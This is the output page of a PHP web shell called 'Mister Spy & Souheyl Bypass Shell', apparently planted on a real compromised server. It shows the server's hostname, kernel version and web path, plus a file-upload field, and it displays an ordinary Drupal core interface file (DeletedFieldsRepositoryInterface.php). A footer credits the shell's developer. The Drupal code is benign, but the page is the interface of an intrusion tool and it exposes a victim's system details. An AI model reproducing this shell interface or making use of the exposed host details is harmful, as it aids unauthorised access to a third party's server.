Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/ift/web/core/lib/Drupal/Core/Field/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/ift/web/core/lib/Drupal/Core/Field/DeletedFieldsRepositoryInterface.php

<?php

namespace Drupal\Core\Field;

/**
 * Provides an interface for a deleted fields repository.
 *
 * @internal
 */
interface DeletedFieldsRepositoryInterface {

  /**
   * Returns a list of deleted field definitions.
   *
   * @param string $field_storage_unique_id
   *   (optional) A unique ID of field storage definition for filtering the
   *   deleted fields. Defaults to NULL.
   *
   * @return \Drupal\Core\Field\FieldDefinitionInterface[]
   *   An array of field definition objects, keyed by their unique identifier.
   */
  public function getFieldDefinitions($field_storage_unique_id = NULL);

  /**
   * Returns a list of deleted field storage definitions.
   *
   * @return \Drupal\Core\Field\FieldStorageDefinitionInterface[]
   *   An array of field storage definition objects, keyed by their unique
   *   storage identifier.
   */
  public function getFieldStorageDefinitions();

  /**
   * Adds a field definition object to the deleted list.
   *
   * @param \Drupal\Core\Field\FieldDefinitionInterface $field_definition
   *   A field definition object.
   *
   * @return $this
   */
  public function addFieldDefinition(FieldDefinitionInterface $field_definition);

  /**
   * Adds a field storage definition object to the deleted list.
   *
   * @param \Drupal\Core\Field\FieldStorageDefinitionInterface $field_storage_definition
   *   A field storage definition object.
   *
   * @return $this
   */
  public function addFieldStorageDefinition(FieldStorageDefinitionInterface $field_storage_definition);

  /**
   * Removes a field definition object from the deleted list.
   *
   * @param \Drupal\Core\Field\FieldDefinitionInterface $field_definition
   *   A field definition object.
   *
   * @return $this
   */
  public function removeFieldDefinition(FieldDefinitionInterface $field_definition);

  /**
   * Removes a field storage definition object from the deleted list.
   *
   * @param \Drupal\Core\Field\FieldStorageDefinitionInterface $field_storage_definition
   *   A field storage definition object.
   *
   * @return $this
   */
  public function removeFieldStorageDefinition(FieldStorageDefinitionInterface $field_storage_definition);

}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net